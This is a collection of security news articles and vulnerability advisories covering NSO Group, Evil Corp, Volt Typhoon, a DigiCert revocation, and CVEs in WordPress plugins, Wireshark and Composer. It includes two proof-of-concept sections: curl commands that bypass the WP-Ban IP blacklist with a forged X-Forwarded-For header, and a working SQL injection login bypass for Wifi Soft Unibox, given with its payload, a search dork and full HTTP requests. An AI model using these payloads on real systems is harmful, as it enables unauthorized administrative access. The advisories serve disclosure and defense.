Cross-Site Request Forgery (CSRF) vulnerability in KubiQ CPT base plugin <= 5.8 at WordPress allows an attacker to delete the CPT base.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Remove custom post type base slug from url

*   possibility to select specific custom post type(s)
*   auto redirect old slugs to no-base slugs

1.  Upload remove-cpt-base directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

I easily removed the services slug from the link

Very simple plugin, but works perfectly! 🎉

A simple but efficient plugin that works like charm... 🙂

couldnt get the slug remove done with custom code on one particular site for whatever reason ... but this little thing works flawlessly! thanks - please keep it up!! 🙂

Read all 18 reviews

“Remove CPT base” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**5.9**

*   added nonce and security checks

**5.8**

*   tested on WP 5.9

**5.7**

*   tested on WP 5.5
*   minor fix

**5.6**

*   tested again with WPML, Polylang and Custom Post Type Permalinks and fixed

**5.5**

*   tested on WP 5.5
*   another fix for Custom Post Type Permalinks plugin

**5.4**

*   enable previews for CPTs without base

**5.3**

*   make it works with WPML
*   make it works with Polylang
*   make it works with Custom Post Type Permalinks plugin

**5.2**

*   tested on WP 5.4

**5.1**

*   removed auto-prevent slug duplicates
*   removed debug mode
*   removed remove\_cpt\_base\_skip filter
*   use default WP function instead of custom
*   make it works for custom rewrite slugs
*   prioritize page and post like WP does

**5.0**

*   YOU HAVE TO SAVE YOUR SETTINGS AGAIN, because:
*   added alternation option for each post type separately
*   added debug mode

**4.8**

*   fix alternative CPT children solving for nested children

**4.7**

*   alternative CPT children solving

**4.6**

*   fix server port redirect

**4.5**

*   make it works for WP installations in directory

**4.4**

*   minor changes

**4.3**

*   fix for some endpoints and make sure post is not interpreted as attachment

**4.2**

*   fix for hierarchical CPTs on some servers

**4.1**

*   make it works for posts interpreted like category by WP

**4.0**

*   tested on WP 5.2
*   make it works for hierarchical post types and different permalink structures
*   going back to ‘pre\_get\_posts’
*   optimize generating slug for duplicate names

**3.3**

*   change HTTP code from 404 to 200

**3.2**

*   fix for query strings

**3.1**

*   add custom endpoint rewrites support

**3.0**

*   stop using complicated ‘pre\_get\_posts’ and handle 404 instead

**2.3**

*   tested on WP 5.0

**2.2**

*   fix 404

**2.1**

*   fix redirect loop in WPML and WooCommerce

**2.0**

*   stop using .htaccess rules

**1.2**

*   auto init after permalinks updated

**1.1**

*   add uninstall hook
*   add duplicate slug check
*   minor updates

**1.0**

*   First version

CVE-2022-29431: Remove CPT base

Even as more attacks target humans, lack of dedicated staff, relevant skills, and time are making it harder to develop a security-aware and engaged workforce, SANS says.

The increasingly complex threat landscape and the porous IT environment – driven by the shift to permanent remote/hybrid work and digital transformation – make the need for a security-aware workforce and healthy security culture more critical than ever. Enterprise defenders say that phishing and social-engineering attacks, ransomware, and business email compromise (BEC) are among their biggest day-to-day headaches.

Security awareness programs can help lessen them, but no one seems to have time to create them, according to the "SANS 2022 Security Awareness Report." The three top challenges for building a mature awareness program cited are lack of time for project management, limits on time available to train employees, and not having enough time to focus on security awareness because of staffing shortages. Lack of budget and lack of leadership support also made the list.

“People have become the primary attack vector for cyberattackers around the world,” says Lance Spitzner, SANS Security Awareness director and co-author of the SANS report. "Humans rather than technology represent the greatest risk to organizations, and the professionals who oversee security awareness programs are the key to effectively managing that risk."

Security awareness professionals lack relevant skills, the report shows. Security awareness responsibilities are very commonly assigned to staff with highly technical backgrounds who may lack the skills needed to effectively engage their workforce and communicate security risks in simple-to-understand terms, according to the report.

More than 69% of security awareness professionals are spending less than half their time on security awareness, the report also shows. That's because they have other security responsibilities. Enterprises should focus on having more professionals focused on security awareness rather than making it part of an already long to-do list. The report encourages documenting and contrasting how many people on the security team are focused on technology versus how many on the team are focused on human risk in order to create a case for a more dedicated team.

The report suggests that a successful security awareness program requires strong leadership support, a larger dedicated team, and a training schedule for employees that emphasizes frequency. Organizations should also communicate to, interact with, or train their workforces at least once a month. Keeping training simple and easy to follow is key toward an engaged workforce, the report says.

“Organizations can no longer justify an annual training to check the compliance box, and it remains critical for organizations to dedicate enough personnel, resources, and tools to manage their human risk effectively," said Spitzner.

Time Constraints Hamper Security Awareness Programs

Pressure mounts on the NSO Group's business viability as Khashoggi widow joins group of plaintiffs suing the Israeli firm for Pegasus spyware abuse.

NSO Group is facing a number of existential crises at the moment, and it appears there's a group of enterprising investors — including, reportedly, a Wrigley chewing gum magnate — ready to take advantage, lassoing control of arguably the most destructive and powerful spyware tool known to-date, i.e., Pegasus.

The Israeli firm was blacklisted by the US government in November 2021 for creating and selling its powerful zero-click spyware tool Pegasus, which has been used by its customers to target and track government officials, human rights workers, journalists, activists, academics, embassy workers, and businesspeople across the world. 

The designation placed severe restrictions on the firm's ability to operate by banning any transfer of US technology to NSO Group. Then, in December 2021 NSO Group's spyware was found on the phones of at least nine US State Department employees, which didn't help thaw the firm's relationship with Biden administration either.

There's also the problem of the mounting number of lawsuits.

**NSO Group's Lawsuit Docket Grows**

A new lawsuit filed by Hanan Elatr, widow of murdered Washington Post journalist Jamal Khashoggi, accuses NSO Group's Pegasus spyware of violating US hacking laws to track the couple leading up to the 2018 killing of the vocal Saudi dissident.

Elatr says in the lawsuit that the Pegasus spyware "caused her immense harm, both through the tragic loss of her husband and through her own loss of safety, privacy, and autonomy, as well as the loss of her financial stability and career."

In addition to Elatr, there are other, far more deep-pocketed legal foes for NSO Group to worry about. Apple filed suit in November 2021 against the organization for targeting its users with Pegasus spyware (attacks that are ongoing). And in January, the US Supreme Court denied a petition to block a suit to proceed against NSO Group filed by Meta-owned WhatsApp for spyware damages.

**Juicy Fruit Heir, Sandler Movie Producer Float NSO Purchase**

Despite the legal, business, and brand challenges, NSO Group reportedly continued to hone and improve Pegasus spyware. A recent report from research organization Citizen Lab, which has been at the forefront of working to expose Pegasus abuse, said it discovered at least three new exploit chains against human rights activists as recently as 2022.

Perhaps because of that, investors have begun to sniff out a potential opportunity. Reportedly, a motley gang of investors including Robert Simonds, a US investor whose background includes producing Adam Sandler movies, and his buddy, cannabis industry investor and chewing-gum fortune heir William "Beau" Wrigley, are looking at buying up NSO Group's assets, according to new reporting from The Guardian.

The report adds a spokesperson for Wrigley denied he is in discussions to buy NSO Group assets, while a source close to Simonds said he was "deep" in talks about a sale but aware it would be a steep climb to get the deal done. 

"Placing such powerful surveillance technology in the hands of individuals who may not have deep expertise in the cyber industry or a history of involvement in the sector raises questions about the potential ramifications," Callie Guenther, cyber threat research manager with Critical Start tells Dark Reading about the potential NSO sell-off. "It is essential to ensure that any potential acquirer of NSO's assets possesses the necessary expertise to handle the technology responsibly, maintain appropriate safeguards, and prevent potential misuse."

It should be noted that other attempts at buying control of Pegasus haven't worked out. Last year L3Harris, an American company and US defense contractor was looking into a possible purchase of NSO Group's technology, but the White House objected over "serious counter-intelligence and security concerns," the Guardian added.

Then there is the Israeli government, which closely regulates NSO Group and could potentially intervene in any sell off of its technology, the Guardian points out.

"NSO operates under close regulation by Israel's Ministry of Defense, and any potential sale of its assets would likely face scrutiny from Israeli authorities," Guenther says. "It remains to be seen how such a transaction could proceed and whether it would comply with relevant regulatory requirements and national security considerations."

Perhaps there's a pot-sweetener here though: The Guardian added a juicy rumor to its reporting that Simonds has privately pledged to hand over the surveillance technology to the so called "Five Eyes" alliance between the intelligence agencies of Australia, Canada, New Zealand, the UK, and the US.

Even so, a pledge is not a guarantee. Guenther outlines a number of potential problems with NSO Group's assets falling into the wrong hands, including giving the new owners the power to improve upon its existing capabilities for exploitation, targeting, as well as slow down future potential vulnerability disclosures.

"The acquisition could impact the overall cyber threat landscape. If NSO's spyware technology becomes more accessible or proliferates in unauthorized hands, it could lead to an increase in targeted attacks, surveillance activities, and potential abuse," Guenther warns. "This would necessitate heightened vigilance and strengthened defensive measures from organizations, governments, and cybersecurity communities to mitigate the associated risks."

**Has Pegasus Already Peaked?**

Many may question the power a tool like Pegasus could have when flying on behalf of someone rich enough to buy it, but the true value of NSO Group, and its dominance in the spyware space, might have already peaked.

JT Keating, senior vice president of mobile security firm Zimperium, explained to Dark Reading that the trend is decidedly moving toward open source spyware, making the surveillance tools available to almost anyone and driving down the value of NSOs proprietary Pegasus product.

"Spyware is now mainstream, including the shift from sole reliance on the Dark Web for distribution to seeing the same kits and tools being found on online repositories like GitHub or online communities like Reddit," Keating says. "Regardless of what happens to organizations like NSO, mobile spyware will only continue to proliferate."

Meanwhile though, the squeeze on NSO Group's business continues.

US Investors Sniffing Around Blacklisted NSO Group Assets

The threat actor behind the notorious Dridex campaign has switched from using its exclusive credential-harvesting malware to a ransomware-as-a-service model, to make attribution harder.

Sanctions that the US government imposed on Russia-based crimeware gang Evil Corp in 2019 appear to have forced the threat actor to change tactics to remain in the cybercrime business.

New research into the group's activity by Mandiant shows that after the sanctions were put in place — after the group caused more than $100 million in losses to banks and other financial institutions by stealing sensitive information — Evil Corp switched to using ransomware in an apparent effort to obscure attribution. 

Moving on from using Dridex, its own exclusive (and easily fingerprinted) malware, Evil Corp actors have been observed deploying ransomware families used by multiple threat groups, such as Hades, WastedLocker, PhoenixLocker, and most recently LockBit, a ransomware-as-a-service option.

US regulations prohibit organizations — including ransomware victims and negotiators — from conducting any kind of financial transactions with organizations and entities on the US Treasury Department's Office of Foreign Assets Control (OFAC) sanctions list.

"\[US\] sanctions have had a direct impact on threat actor operations, particularly as at least some companies involved in ransomware remediation activities, such as negotiation, refuse to facilitate payments to known sanctioned entities," Mandiant says in its report. "This can ultimately reduce threat actors' ability to be paid by victims, which is the primary driver of ransomware operations."

That means US ransomware victims need to pay closer attention to whom they are dealing with, says Jeremy Kennelly, senior manager of financial crime analysis at Mandiant Threat Intelligence.

"When dealing with a ransomware intrusion, the particular malware being deployed, or the branding on ransom notes, or shaming websites may be insufficient to determine whether the beneficiary of payments has affiliations with Evil Corp, a sanctioned entity," he says.

**Sanctions Crunch**

OFAC sanctioned Evil Corp and two members associated with the group for stealing more than $100 million from financial institutions in 40 countries using credentials harvested with the Dridex malware tool.

Around the time the sanctions were imposed, Evil Corp had begun renting out Dridex for use by affiliate gangs. It also had begun making its own foray into the ransomware space, initially with BitPaymer ransomware and later with DopplePaymer and WastedLocker in 2019. 

In 2020 Evil Corp. targeted more than two-dozen US organizations with ransomware, including several Fortune 500 companies in a massive WastedLocker campaign. Months after the sanctions went into effect, the threat actor stopped using WastedLocker and soon after switched to a variety of other tools, such as Hades and most recently LockBit — a ransomware-as-a service tool that gives the threat actor an opportunity to blend in with other actors.

**UNC2165: Another Evolution of Evil Corp.**

Mandiant says since 2019 it has investigated multiple LockBit ransomware intrusions carried out by a group that the vendor is currently tracking as UNC2165. According to Mandiant, UNC2165 has a lot of overlap with Evil Corp and is most likely an actor closely affiliated with it. For instance, in all the intrusions that Mandiant investigated, UNC2165 obtained access to the victim network via UNC1543, a financially motivated threat group that distributes FakeUpdates, a multistage JavaScript dropper for distributing malware. FakeUpdates was also the infection chain for deploying Dridex that later resulted in BitPaymer and DopplePaymer ransomware infections.

Similarly, the Hades ransomware family that Mandiant observed UNC2165 deploying had multiple code similarities to other ransomware tools tied to Evil Corp. Several of the command-and-control servers that UNC2165 has been observed using have also been linked to Evil Corp infrastructure, Mandiant says.

"The operational relationship between UNC2165 and the broader Evil Corp group is not fully understood," Kennelly says. "Mandiant has observed UNC2165 deploying Hades ransomware and operating Hades-related infrastructure. Furthermore, multiple public reports related to the deployment of other ransomware families commonly attributed to Evil Corp have involved use of infrastructure Mandiant attributes to UNC2165."

Kennelly says it's unclear what impact Mandiant's report tying an Evil Corp-related actor to LockBit will have in the ransomware space. 

"The impact this disclosure will have on ransomware negotiators is difficult to predict," he says. "LockBit may quickly move to distance themselves from affiliates with ties to Evil Corp, or deny the allegations wholesale," he says.

Furthermore, UNC2165 has shifted their operations multiple times over the past years, and this may ultimately lead to them to again adopt an updated toolkit if ransomware negotiators halt work on LockBit cases, he notes.

US Sanctions Force Evil Corp to Change Tactics

In Wireshark 2.4.0 to 2.4.13, 2.6.0 to 2.6.7, and 3.0.0, the DCERPC SPOOLSS dissector could crash. This was addressed in epan/dissectors/packet-dcerpc-spoolss.c by adding a boundary check.

**Summary**

**Name:** DCERPC SPOOLSS dissector crash

**Docid:** wnpa-sec-2019-18

**Date:** April 8, 2019

**Affected versions:** 3.0.0, 2.6.0 to 2.6.7, 2.4.0 to 2.4.13

**Fixed versions:** 3.0.1, 2.6.8, 2.4.14

**References:**

Wireshark issue 15568.  
CVE-2019-10903.

**Details****Description**

The DCERPC SPOOLSS dissector could crash. Discovered by Mateusz Jurczyk.

**Impact**

It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.

**Resolution**

Upgrade to Wireshark 3.0.1, 2.6.8, 2.4.14 or later.

CVE-2019-10903: Wireshark • wnpa-sec-2019-18 DCERPC SPOOLSS dissector crash

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain.
The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV).
"Before issuing a certificate to a

Web Security / Compliance

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain.

The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV).

"Before issuing a certificate to a customer, DigiCert validates the customer's control or ownership over the domain name for which they are requesting a certificate using one of several methods approved by the CA/Browser Forum (CABF)," it said.

One of the ways this is done hinges on the customer setting up a DNS CNAME record containing a random value provided to them by DigiCert, which then performs a DNS lookup for the domain in question to make sure that the random values are the same.

The random value, per DigiCert, is prefixed with an underscore character so as to prevent a possible collision with an actual subdomain that uses the same random value.

What the Utah-based company found was that it had failed to include the underscore prefix with the random value used in some CNAME-based validation cases.

The issue has its roots in a series of changes that were enacted starting in 2019 to revamp the underlying architecture, as part of which the code adding an underscore prefix was removed and subsequently "added to some paths in the updated system" but not to one path that neither added it automatically nor checked if the random value had a pre-appended underscore.

"The omission of an automatic underscore prefix was not caught during the cross-functional team reviews that occurred before deployment of the updated system," DigiCert said.

"While we had regression testing in place, those tests failed to alert us to the change in functionality because the regression tests were scoped to workflows and functionality instead of the content/structure of the random value."

"Unfortunately, no reviews were done to compare the legacy random value implementations with the random value implementations in the new system for every scenario. Had we conducted those evaluations, we would have learned earlier that the system was not automatically adding the underscore prefix to the random value where needed."

Subsequently, on June 11, 2024, DigiCert said it revamped the random value generation process and eliminated the manual addition of the underscore prefix within the confines of a user-experience enhancement project, but acknowledged it again failed to "compare this UX change against the underscore flow in the legacy system."

The company said it didn't discover the non-compliance issue until "several weeks ago" when an unnamed customer reached out regarding the random values used in validation, prompting a deeper review.

It also noted that the incident impacts approximately 0.4% of the applicable domain validations, which, according to an update on the related Bugzilla report, affects 83,267 certificates and 6,807 customers.

Notified customers are recommended to replace their certificates as soon as possible by signing into their DigiCert accounts, generating a Certificate Signing Request (CSR), and reissuing them after passing DCV.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to publish an alert, stating that "revocation of these certificates may cause temporary disruptions to websites, services, and applications relying on these certificates for secure communication."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DigiCert to Revoke 83,000+ SSL Certificates Due to Domain Validation Oversight

WP-Ban plugin before 1.6.4 for WordPress, when running in certain configurations, allows remote attackers to bypass the IP blacklist via a crafted X-Forwarded-For header.

**Full Disclosure mailing list archives**

_From_: dxw Security <security () dxw com>  
_Date_: Wed, 17 Sep 2014 13:59:56 +0000  

Details
================
Software: WP-Ban
Version: 1.62
Homepage: http://wordpress.org/plugins/wp-ban/
Advisory report: 
https://security.dxw.com/advisories/vulnerability-in-wp-ban-allows-visitors-to-bypass-the-ip-blacklist-in-some-configurations/
CVE: CVE-2014-6230
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations

Vulnerability
================
This plugin allows blacklisting users based on their IP address, however it takes the IP address from the 
X-Forwarded-For header if available.
Not all Web server configurations will strip or replace X-Forwarded-For headers – in which case the IP ban can be 
bypassed by sending this header. This plugin therefore only works in certain configurations, but does not warn admins 
of this fact.

Proof of concept
================

Visit http://localhost/wp-admin/admin.php?page=wp-ban/ban-options.php
Set “Banned IPs” to “127.0.0.1″
Execute “curl http://localhost/\\"; and see the “You Are Banned” message
Execute “curl http://localhost/ -H \\'X-Forwarded-For: 999.999.999.999\\'\\" and see that it displays the page

Note that this will not work if your Web server sets or strips X-Forwarded-For headers.
(To remove the IP blacklist run this SQL: “delete from wp\_options where option\_name=\\'banned\_ips\\';\\")

Mitigations
================
Upgrade to version 1.6.4 or later.
If a reverse-proxy is used, check the “I am using a reverse proxy” box in the plugin settings, and ensure that 
X-Forwarded-For headers are being set even if the request already contains an X-Forwarded-For header.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: 
https://security.dxw.com/disclosure/

Please contact us on security () dxw com to acknowledge this report if you received it via a third party (for example, 
plugins () wordpress org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-08-27: Discovered
2014-09-04: Reported to vendor by email
2014-09-04: Requested CVE
2014-09-04: Vendor responded
2014-09-17: Vendor reported a fixed version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
          


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations (WordPress plugin)** _dxw Security (Sep 17)_

CVE-2014-6230: Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations (WordPress plugin)

Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

CVE-2023-34635: Wifi Soft Unibox Administration 3.0

Researchers say the state-sponsored espionage operation may also lay the groundwork for disruptive cyberattacks.

As state-sponsored hackers working on behalf of Russia, Iran, and North Korea have for years wreaked havoc with disruptive cyberattacks across the globe, China's military and intelligence hackers have largely maintained a reputation for constraining their intrusions to espionage. But when those cyberspies breach critical infrastructure in the United States—and specifically a US territory on China's doorstep—spying, conflict contingency planning, and cyberwar escalation all start to look dangerously similar.

On Wednesday, Microsoft revealed in a blog post that it has tracked a group of what it believes to be Chinese state-sponsored hackers who have since 2021 carried out a broad hacking campaign that has targeted critical infrastructure systems in US states and Guam, including communications, manufacturing, utilities, construction, and transportation. 

The intentions of the group, which Microsoft has named Volt Typhoon, may simply be espionage, given that it doesn’t appear to have used its access to those critical networks to carry out data destruction or other offensive attacks. But Microsoft warns that the nature of the group's targeting, including in a Pacific territory that might play a key role in a military or diplomatic conflict with China, may yet enable that sort of disruption.

"Observed behavior suggests that the threat actor intends to perform espionage and maintain access without being detected for as long as possible," the company's blog post reads. But it couples that statement with an assessment with "moderate confidence" that the hackers are “pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.”

Google-owned cybersecurity firm Mandiant says it has also tracked a swath of the group's intrusions and offers a similar warning about the group's focus on critical infrastructure “There's not a clear connection to intellectual property or policy information that we expect from an espionage operation,” says John Hultquist, who heads threat intelligence at Mandiant. “That leads us to question whether they’re there _because_ the targets are critical. Our concern is that the focus on critical infrastructure is preparation for potential disruptive or destructive attack.”

Microsoft’s blog post offered technical details of the hackers’ intrusions that may help network defenders spot and evict them: The group, for instance, uses hacked routers, firewalls, and other network “edge” devices as proxies to launch its hacking—targeting devices  that include those sold by hardware makers ASUS, Cisco, D-Link, Netgear, and Zyxel. The group also often exploits the access provided from compromised accounts of legitimate users rather than its own malware to make its activity harder to detect by appearing to be benign.

Blending in with a target's regular network traffic in an attempt to evade detection is a hallmark of Volt Typhoon and other Chinese actors' approach in recent years, says Marc Burnard, a senior consultant of information security research at Secureworks. Like Microsoft and Mandiant, the Secureworks has been tracking the group and observing the campaigns. He added that the group has demonstrated a “relentless focus on adaption” to pursue its espionage.

US government agencies, including the National Security Agency, the Cybersecurity and Infrastructure Security Agency (CISA), and the Justice Department published a joint advisory about Volt Typhoon's activity today alongside Canadian, UK, and Australian intelligence. “Private sector partners have identified that this activity affects networks across US critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide,” the agencies wrote.

Although Chinese state-sponsored hackers have never launched a disruptive cyberattack against the United States—even over decades of data theft from US systems—the country’s hackers have periodically been caught inside US critical infrastructure systems. As early as 2009, US intelligence officials warned that Chinese cyberspies had penetrated the US power grid to “map” the country's infrastructure in preparation for a potential conflict. Two years ago, CISA and the FBI also issued an advisory that China had penetrated US oil and gas pipelines between 2011 and 2013. China’s Ministry of State Security hackers have gone much further in cyberattacks against the country’s Asian neighbors, actually crossing the line of carrying out data-destroying attacks disguised as ransomware, including against Taiwan’s state-owned oil firm CPC.

This latest set of intrusions seen by Microsoft and Mandiant suggests that China’s critical infrastructure hacking continues. But even if the Volt Typhoon hackers did seek to go beyond espionage and lay the groundwork for cyberattacks, the nature of that threat is far from clear. State-sponsored hackers are, after all, often assigned to gain access to an adversary’s critical infrastructure as a preparatory measure in case of a future conflict, since gaining the access  necessary for a disruptive attack usually requires months of advanced work.

That ambiguity in state-sponsored hackers’ motivations when they penetrate another country’s networks—and its potential for misinterpretation and escalation—is what Georgetown professor Ben Buchanan has called “the cybersecurity dilemma” in his book by the same name. “Genuinely attacking and building the option to attack later on,” Buchanan told WIRED in a 2019 interview as cyberwar tensions rose between the US and Russia, “are very hard to disentangle."

Drawing the lines between espionage, cyberattack preparation, and imminent cyberattack is an even harder exercise with China, says Mandiant’s Hultquist, given the limited instances of the country pulling the trigger on a digitally disruptive event—even when it does have the access to cause one, as it may well have had in Volt Typhoon’s intrusions. “China’s disruptive and destructive capabilities are extremely opaque,” he says. “Here we have a possible indication that this might be an actor with that mission.”

China Hacks US Critical Networks in Guam, Raising Cyberwar Fears

### Impact

The `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code.

### Patches

2.2.24 for 2.2 LTS or 2.7.7 for mainline

### Workarounds

Avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-35241

**Composer has a command injection via malicious git branch name**

High severity GitHub Reviewed Published Jun 10, 2024 in composer/composer • Updated Jun 10, 2024

**Package**

composer composer/composer (Composer)

**Affected versions**

\>= 2.0, < 2.2.24

\>= 2.3, < 2.7.7

**Patched versions**

2.2.24

2.7.7

**Impact**

The status, reinstall and remove commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code.

**Patches**

2.2.24 for 2.2 LTS or 2.7.7 for mainline

**Workarounds**

Avoid installing dependencies via git by using --prefer-dist or the preferred-install: dist config setting.

**References**

*   GHSA-47f6-5gq3-vx9c
*   composer/composer@b93fc6c
*   composer/composer@ee28354

Published to the GitHub Advisory Database

Jun 10, 2024

Last updated

Jun 10, 2024

Search

lenovo warranty check/lookup | check warranty status | lenovo support us